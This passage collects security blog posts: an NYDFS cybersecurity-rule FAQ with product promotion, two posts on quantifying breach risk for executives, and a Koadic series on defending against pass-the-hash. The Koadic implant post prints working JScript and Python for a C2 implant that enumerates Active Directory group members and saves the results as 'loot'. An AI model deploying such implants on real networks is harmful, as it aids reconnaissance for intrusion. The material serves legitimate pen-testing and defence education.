      No. You only have to report events that have a “reasonable likelihood of materially harming any material part” of the company’s IT infrastructure. For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.
    2. How frequently do you have to conduct risk assessments?
      Covered entities are supposed to conduct “periodic” assessments. However, keep in mind the CISOs will have to certify annually (see below) that their organization is in compliance. You should expect to do assessments at a minimum once per year.
    3. How much documentation is required beyond developing security policies?
      There’s no escaping the fact that reporting requirements are significant, and CISOs will be busy just handling this new regulation. In addition to reporting material cyber incidents to NYDFS, the CISOs will have to report annually to the board or governing body the current cybersecurity state of the organization, including material cybersecurity risks, effectiveness of controls, and material cybersecurity events. For any weaknesses that are discovered as part of the assessment, CISOs will need to document the remediation efforts that were undertaken. Finally, the CISO will also have to annually certify to the NYDFS that their organization is in compliance.

NYDFS Cybersecurity Regulation Tips for Compliance

There are few important points to keep in mind about the NYDFS regulations:

  • NYSDFS rules on breach reporting cover a far broader type of cyber event than any other state. Not only does the organization have to report stolen information, but also any attempt to gain access or to disrupt or misuse system. This includes denial-of-service (DoS), ransomware, and any kind of post-exploitation where system tools are leveraged and misused. Look for monitoring systems that have the capability to detect unusual access to sensitive data.
  • There are significant training requirement for cyber staff. Companies will have to provide corporate training to “address relevant cybersecurity risks”. And cyber staff are not off the hook either: they are required to take steps to keep professionally current with cybersecurity trends. Financial companies in New York will likely need to up their training budgets to meet these rules.
  • Data classification is a critical first step in performing a risk assessment. A security team will need to determine how much PII is in the organization, where it is located, and who has access to it in order to evaluate potential risk. This information is then used to tune access rights to this sensitive data so that only those who really need data as part of their role have access — and no one else.

How Varonis Can Help

NYDFS Requirement
Section 500.02 Cybersecurity Program. Varonis detects insider threats and cyberattacks by analyzing data, account activity, and user behavior; prevents and limits disaster by locking down sensitive and stale data; and efficiently sustains a secure state with automation.
Section 500.06 Audit Trail. Varonis gives you a single unified platform to manage risk and protect your most important assets, along with built-in reports and a detailed, searchable audit trail of data access.

With a unified audit trail, admins or security analysts are only a few clicks away from knowing who’s been opening, creating, deleting, or modifying important files, sites, Azure Active Directory objects, emails, and more.

Section 500.07 Access Privileges DatAdvantage maps who can access data and who does access data across file and email systems, shows where users have too much access, and then safely automates changes to access control lists and security groups.

DataPrivilege gives business users the power to review and manage permissions, groups, and access certification, while automatically enforcing business rules.

The Automation Engine discovers undetected security gaps and automatically repairs them: fixing hidden security vulnerabilities like inconsistent ACLs and global access to sensitive data.

Section 500.09 Risk Assessment. Varonis Risk Assessments provide a comprehensive report that highlights at-risk sensitive data, flags access control issues, and quantifies risk.  The risk assessment summarizes key findings, exposes data vulnerabilities, provides a detailed explanation of each finding, and includes prioritized remediation recommendations.
Section 500.13 Limitations on Data Retention. Data Transport Engine automatically moves, archives, quarantines, or deletes data based on content type, age, access activity, and more. Migrate data cross-domain or cross-platform, all while keeping permissions intact and even making them better.

Quarantine sensitive and regulated content, discover data to collect for legal hold, identify data to archive and delete, and optimize your existing platforms.

Section 500.14 Training and Monitoring. Varonis continually monitors and alerts on your core data and systems.

Detect unusual file and email activity, suspicious user behavior, and trigger alerts cross-platform to protect your data before it’s too late. Automatic response triggers can stop ransomware in its tracks, and mitigate the impact of compromised accounts and potential data breaches.

Visualize security threats with an intuitive dashboard, investigate security incidents – even track alerts and assign them to team members for closure.

Section 500.16 Incident Response Plan.
Section 500.17 Notices to Superintendent.

NYDFS dictates that risk assessments are not just a good idea, but (at least in New York State) are required for financial companies. Get started with a free risk assessment: we’ll identify PII, flag excessive permissions, and help you prioritize at-risk areas – and take the first steps towards meeting NYDFS compliance.

Koadic: Security Defense in the Age of LoL Malware, Part IV

Koadic: Security Defense in the Age of LoL Malware, Part IV

One of the advantages of examining the gears inside Koadic is that you gain low-level knowledge into how real-world attacks are accomplished. Pen testing tools allow you to explore how hackers move around or pivot once inside a victim’s system, and help you gain insights into effective defensive measures.

Block that Hash Passing

Pass the Hash (PtH) is one approach, not the only, for moving beyond the initial entry point in the targeted system. It’s received lots of intention, so it’s worth looking at more closely.

The key assumption behind PtH is that you already have local administrative privileges, which is required by mimikatz and other hash passers. Koadic conveniently provides mimikatz in one of its  implants.

Is getting admin privileges for PtH an issue for hackers?

Generally not! They hackeratti have found that obtaining local admin privileges is not a major barrier. They’ve been able to take advantage of special exploits, guess default Administrator passwords, or get lucky and land on an account that already has higher privileges.

Koadic, for example, includes a few implants that can raise privilege levels. The one I tried is based on Matt Nelson’s work involving the auto elevation capabilities of the Windows binary, eventvwr.exe, which is, somewhat ironically, the WIndows Event Viewer. Anyway, Microsoft has since come out with a patch for this exploit in Windows 10.

At one point during my initial testing over the summer, Koadic’s bypassuac_eventvw implant seemed to have been working on my Amazon instance. In my last test, it failed, and I’ll assume I got lucky working with an unpatched system in my first go around.

There’s a lesson here: in the wild, not every system is going to be patched, and hackers will hunt around until they find one!

UAC Helps!

Microsoft has written a long and comprehensive white paper on preventing PtH. It’s worth your time to scan through it. However, there’s also been much written by security wonks on what Microsoft has done (or not done) in preventing PtH. And after reading more in-depth analysis, I’m not sure I understand all the subtleties!

In any case, one of Microsoft’s recommendations is User Access Controls, UAC for short, which was a security control added at the time of Vista. It prevents privileged accounts from automatically doing what they want until their actions are approved (on a secure console) by a human. You may have seen the UAC dialog show up on your office laptop when you try to download and execute a binary from the Intertoobz.

You can find the UAC settings in Group Policy Objects under Policies\Windows Settings\Local Polices\Security Options (below). The MS honchos recommend, at a minimum, enabling Admin approval mode. In my testing, I got carried away and liberally enabled a few other UAC options.

With UAC enabled, I was able to stop Koadic from running its mimikatz implant.

I set up a scenario where the Koadic stager is directly launched from a local Administrator account. Even in this obvious case, you eventually have to deal with UAC. You can still run commands remotely from the Koadic console, but if you try to engage in a PtH pivot, you’re blocked (below).  I checked the event log, and sure enough there’s an entry showing the UAC was activated.

Blocked by UAC!

In short: UAC prevents hackers from getting to domain-level credentials and easily hopping from one computer to another.

The Horror of Local Administrator Accounts

One of the root enablers of lateral movement are the local Administrator accounts that once upon a time Windows set up automatically. To make life easier, IT admins have often configured these accounts with the same easily guessable passwords across many machines.

For hackers, that’s like throwing gasoline on the fire: once in, they can effortlessly navigate around the victim’s system without even a PtH. They just run psexec, supplying it explicitly with the Administrator’s password, say admin123.  Easy peasy.

There’s another bad practice of giving some users — often executives — local Administrator privileges on the mistaken belief they need these extra privileges to do special tasks. In other other words, their users accounts are added to the local Administrator group on their laptops.

Lucky hackers that land on one of these machines can then hit the ground running: they already have elevated permissions so they can PtH from the get go.

What are some ideas for lessening the risks with local accounts?

The aforementioned PtH white paper document suggests removing ordinary domain users from the local Administrator group. A good idea, and I approve of this message.

If you do keep local Administrator accounts, then make sure they have high entropy passwords. It can be a major heachache to go back and update bad admin passwords for larger sites. Microsoft generously provides Local Administrator Password Solution (LAPS) and Restricted Groups to allow companies to central manage these accounts. It’s topic I took up in this post.

You could then follow this up by preventing local accounts from logging in remotely. There’s a GPO setting under Policies\Windows Settings\Local Policies\User Rights Assignment called “Deny access to this computer from the network”. By configuring with a local SID, as explained here, you should be able to block any local account from networking.

[Updated]

So even if hackers have gained a privileged local account, we can stop them from moving around with this GPO setting. I’ve not tried this particularly efficient way of stomping out PtH, but I’ll  update this post as soon as I give it a test ride

I did get a chance to try this recent patch, which makes it incredibly convenient to disable local Administrator accounts from networking on a domain level by providing this new SID, “NT AUTHORITY\Local account and member of Administrators group”. You just need enter this loooong string into the deny networking GPO setting:

Stop local admin networking now! There’s a separate GPO, by the way, for disabling remote desktopping.

This is not necessarily a bad idea. Yes, you’ve prevented hackers from networking with, say, psexec, if they happen to guess the local Administrator password correctly. And probably inconveniencing and making some admins more than a little angry along the way.

If you don’t want to inconvenience your own team, and assuming they have a good, hard-to-guess passwords, there’s another possibility. But therein lies a tale, which is covered in this extensive post by the awesome Will “harmj0y” Schroeder. To turn off the token passing that allows the PtH attack to succeed, you have to deal with two regedit settings found under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (below).

With these two regedit settings, you can turn off PtHing. It will stop hackers form dumping admin credentials and re-using them on another machine.

After some trial and error, I think I finally got what harmj0y was saying. In short, you can allow admins to network with their high-entropy, hard-to-guess passwords while stopping hackers from PtHing. l’ll talk more about this in another post.

Closing Thoughts on LoL Defense

Keeping the hackers contained on a single machine is a practical way to reduce risks. Sure they’re inside and still can do some reconnaissance, but at least you’ve contained them.

Koadic shows how hackers can use existing Windows binaries — mshta, rundll32 — to download scripts. But you can turn off this remote script loading capability, and shut down the attack from the start with Windows Firewall!  There’s no reason these binaries should be accessing the Internet, and Firewall let’s you disable their outbound connections.

Finally, Windows 10 will, no doubt, lead us all into a more secure future. Its Windows Defender has powerful malware detection capabilities, and Credential Guard seems to have a more comprehensive solution to dealing with hashes and Kerberos tickets. I’ll take this up in a future post.

 

 

CEO vs. CISO Mindsets, Part II: Breach Risk, Security Investment, and Think...

CEO vs. CISO Mindsets, Part II: Breach Risk, Security Investment, and Thinking Like an MBA

In the last post, I brought up the cultural differences between CEOs and CISOs. One group is managing and growing the business, using spreadsheets to game plan various money making scenarios. The other is keeping the IT infrastructure going 24/7, and studying network diagrams while tweaking PowerShell scripts. I think you know which is which.

The point of this series is to bridge the divide between these two different tribes. In this post, I’ll be dispensing advice on how CISOs and CIOs can begin to convince their overlords — CFOS and CEOs — to pay for data security software. And the first step is to get a better understanding of how CEOs do their work.

Instant MBA for CISOs

The cultural problem begins at business school. No doubt there are more than a few CISOs and CIOs with MBAs but most of them are too busy learning about the latest pen testing techniques or studying for their next IT certification.

However, I can save CISOs two years of study and hundreds of thousands of dollars in tuition. I’ve taken a brief tour of a typical MBA syllabus and can boldly say that everything you need to know about higher-business thinking can be distilled in a simple example.

Let’s say, as they do in a typical B-school assignment, you have $500,000 to invest. If you put it all in a savings account, you can earn a risk-free 1% per year or $5000. Or you have a chance to take a stake in some tech startups for $10,000 a pop. In this example, you have a 1 in 20 or 5% chance of cashing in at a later round of startup financing to the tune of $400,000.

Which option is better?

MBA students learn about such higher-concepts as the law of large numbers, and they effortlessly calculate the average return on the above investment. They know in the long run they’ll come out ahead with the startup investments, and in the short run they’ll have to deal with the cruel winds of Fortune (and gambler’s ruin).

So with the 50 investments in startups, you have a 72% chance of yielding two or more startup victories, and cashing out for at least $800,000. On the other hand, you can lose the entire $500,000 investment 28% of the time. But the payouts will ultimately cover the losses and give a profit to boot —  an expected payout of $1 million for a profit of $500,000.

What does this have to do with convincing executives to invest in data protection software?

Let’s say the CEO has a spreadsheet — trust me, she does! — showing revenues and costs projected over the next few years. Of course, she’s assigned various weights or probabilities to different scenarios and calculated an average payout for each.

Here’s the bad news for CIOs and CISOs. While the standard IT reports, charts, and statistics are essential to understanding the companies current security status, they are not useful in themselves to CEOs. You’d get a “so what?” if you showed them a graph of the number of bots probing ports on an hourly basis.

In justifying an investment in new data security software, a CEO wants to know how data security software will bend or shape the projections in the spreadsheets.

To convince the other C-levels and/or the board of directors, the CISO will have to prove that a breach, with some non-trivial probability, can occur that will cause a significant loss involving legal costs, regulatory fines, class action suits, and customer churn. And then explain how the proposed security software will ultimately pay for itself by protecting against these breaches, thereby keeping the business plans on track.

Data Breaches and Risk

This is not a unique problem in business decision making. Some of the ideas and support tools I’ll be discussing below may be new to CIOs, but they can be learned and applied easily for anyone who’s done even the simplest model building.

First, let me give a shout out to the Cyentia Institute and a gold star to the FAIR Institute. You can noodle on these things on your own, as I did, but it helps that FAIR has a systematic methodology to arrive at an analysis that any CEO would be happy to hear out.

For the naysayers who think this is all guesswork and mathiness, there are more real-world datasets available than you might at first think, and the methodologies I’ll be discussing are more accurate than being guided by intuition alone.

FAIR’s approach forces you to delve into two areas: the magnitude or cost of a data breach incident, and the frequency at which these attacks arise. From that you can come up with a reasonable estimate of the average cost of dealing with breaches over a given time period.

Let’s take up the first part, the cost of a breach. Actually, this is not a single number! It’s really a distribution of percentages — say, 10% of breach incidents cost less than 10,000, 15% are $30,000 or less, etc. This distribution of losses goes under the fancy name of exceedance or excess loss probabilities. In the real word, insurance companies produce these distribution charts to work out auto or home policies for their risk pools.

Can you work out an exceedance probability for your own situation?

You may have to do some digging and perhaps basic model building. However, for healthcare breaches in particular, we have an embarrassment of riches thanks to HIPAA!

I was able to take the last two years of HIPAA breach report data and calculate losses based on Jay Jacob’s breach cost regression formula. The loss distribution comes from ranking the costs from smallest to largest and calculating the percentages. My approach is not quite a true excess loss, but we’ll take that up next time.

Loss distribution based on about 300 data points from 2016 – 2018. (Source: HIPAA)

It’s worthwhile to ponder the above, and note how the incidents cluster at the base while the tail has fewer but more enormous incidents: in the tens of millions, with one weighing in at over $100 million dollars. I’m smelling a fat tail!

As a sanity check for my dataset, I calculated the average cost of a health incident to be around $4.2 million. This is in the ballpark of Ponemon’s incident cost numbers — you can check the 2018 report for yourself. I can do more analysis of this curve, but let’s give ourselves a break.

In short, if you’re a hospital or insurer and are hit with a breach, there’s a small chance you’ll really get whomped!

This is exactly the kind of information a hospital CEO would want to know! However, to derive a more practical answer, you’ll need to guesstimate the chances of your organization getting breached in the first place.

We’ll go over some of this again next time, and then try to work out a more complete argument to make to CEOs and boards to support buying data protection software.

If you want a homework assignment, review Evan Wheeler’s informative and strangely calming RSA presentations on cyber risk management. It’s a big subject with lots of variables and unknowns, but Evan breaks the problem into more digestible portions using the FAIR methodology. Bravo, Evan!

Continue reading the next post in "CEO vs. CSO Mindsets"

Koadic: Implants and Pen Testing Wisdom, Part III

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver JavaScript malware implants to the target and then interact with them from the comfort of your console.

Sure there’s a learning curve to understanding the way the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python shell (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you need to code up these two parts. And that’s all you need to know. Not quite. I’ll get into some more details below.

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant to list AD members for a given group. It seemed like something I can do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never coded the JavaScript to access Active Directory, you’ll find oodles of online examples on how to set up a connection to a data source using the ADODB object — for example this tutorial. The trickiest part is fine tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider="ADsDSOObject";
objConnection.Open("Active Directory Provider");
objCommand = new ActiveXObject( "ADODB.Command");


Koadic.work.report("Gathering users ...");
strDom = "<LDAP://"+strDomain+">";
strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users,"+strDomain+"))";  //Koadic replaces ~GROUP~ with info field
strAttributes = "ADsPath";

strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText=strQuery;

objRecordSet = objCommand.Execute();
objRecordSet.Movefirst;
user_str="";
while(!(objRecordSet.EoF)) {

  user_str +=objRecordSet.Fields("ADsPath").value;
  user_str +="\n";
  objRecordSet.MoveNext;
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted from an existing Koadic implant, which I’m calling enum_adusers. You can view a part of my implant below.

import core.implant
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()
    def display(self):
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            save_file = "/tmp/loot."+self.session.ip+"."+uuid.uuid4().hex
            with open(save_file, "w") as f:
              f.write(self.data)
            self.shell.print_good("Saved loot list to "+save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class, in particular the print methods. Under the hood, Koadic is scooping up the data sent by the JavaScript code’s report function, and displaying it to the console.

By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this, partially to inspire you to roll your own implants. But also to make another point. The underlying techniques that Koadic relies on —  rundll32 and mshta — have been known about by hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses

Let’s say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this,“ Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling you’ll learn that Windows Internet security controls has a special setting to allow browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure that this was disabled for my server instance, which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant to pull in AD users to work.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy product for letting you leverage HTML for internal business apps.

The real pen testing wisdom I gained is that if this particular script runs, it means that the remote data source security control is enabled, which is not a good thing, even and perhaps especially on a server.

Next time, I’ll be wrapping up this series, and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Master Fileless Malware Penetration Testing!

Master Fileless Malware Penetration Testing!

Our five-part series brings you up to speed on stealthy techniques used by hackers. Learn how to sneakily run scripts with mshta, rundll32, and regsrvr32, scary Windows binaries that live in your System32 folder!

Continue reading the next post in "Living off the Land With Microsoft"

CEO vs. CISO Data Security Mindsets, Part I

CEO vs. CISO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks Wade —  behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap, and try to get everyone on the same page. (And after that I’ll take on  world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CISOs and board subjects to rate the value of cybersecurity to their business in five different categories: security guidance, business enabler, loss avoidance, data protection, and brand protections (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated by under 30% of CISOs, but over 80% of board members as valuable. Maybe, I’m a crazy idealist, but you’d think that would be job #1 for CISOs!

The explanation from Cyentia on this point is worth noting: “CISOs of course knows that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — not just providing a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers. Although that belief is not shared equally by the board — only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at  less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can have serious reputational damage, leading to lost sales and law suits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cynentia has identified an enormous gap between what CISOs think is important versus the board regarding the value of cybersecurity. This leads nicely to another result of theirs related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source:Cyentia Institute)

Cyentia tells us there’s approximately a balance between both sides for many of the IT metrics. However, there’s a large gap between CISOs and boards over the the importance of “risk posture” metrics. It’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad an outcome of a breach, or insider attack, or accidental disclosure can reach in dollars, and the frequency or probability that these events could happen.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this years RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested in both rare cybersecurity events that incur huge losses – think Equifax – and more likely events but that typically have far lower costs – spam mail, say, to get corporate credit card numbers use in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which is basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.